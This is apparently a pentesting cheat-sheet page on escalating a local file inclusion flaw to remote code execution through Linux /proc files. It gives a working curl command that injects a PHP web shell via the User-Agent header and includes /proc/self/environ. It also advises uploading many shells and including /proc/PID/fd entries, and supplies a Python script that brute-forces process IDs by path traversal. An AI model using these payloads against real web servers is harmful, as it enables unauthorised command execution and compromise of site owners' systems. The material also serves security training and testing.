/proc is very special in that it is also a virtual filesystem. It's sometimes referred to as a process information pseudo-file system. It doesn't contain 'real' files but runtime system information (e.g. system memory, devices mounted, hardware configuration, etc).
We may use it to gain remote code execution using a LFI vulnerability
Practice
Like a log file, send the payload in the User-Agent, it may be reflected inside the /proc/self/environ file
# Sending a request to $URL with a malicious user-agent
# Accessing the payload via LFI
curl --user-agent "<?php passthru(\$_GET['cmd']); ?>" $URL/?parameter=../../../proc/self/environ
If you can upload files but don't where they are located on the disk, you may use this method.
Upload a lot of shells (for example : 100), and then include the /proc/$PID/fd/$FD in your LFI:
# Accessing the payload via LFI
curl $URL?page=/proc/$PID/fd/$FD?cmd=id
You can brute force PID using this script, the adapt it to brute force FD
import requests
import re
print("Running: ")
for x in range(0,10000):
url = "http://vulnerable.website/../../../../../../proc/"+ str(x) +"/cmdline"
r = requests.get(url)
length_of_resp = len(r.content)
content = r.content
if (length_of_resp > 150):
print("FOUND PROCESS")
print("URL:" + r.url)
print("Length:" + str(length_of_resp))
print("Result:", re.split("/cmdline/" , str(content) ) )
print("#####################################\n")
